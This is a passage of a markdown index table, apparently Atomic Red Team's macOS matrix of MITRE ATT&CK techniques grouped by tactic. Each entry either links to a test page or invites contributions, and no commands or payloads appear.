| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Screen Capture](../../T1113/T1113.md) | | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Local Accounts](../../T1078.003/T1078.003.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Trap](../../T1546.005/T1546.005.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Startup Items](../../T1037.005/T1037.005.md) | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Trap](../../T1546.005/T1546.005.md) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
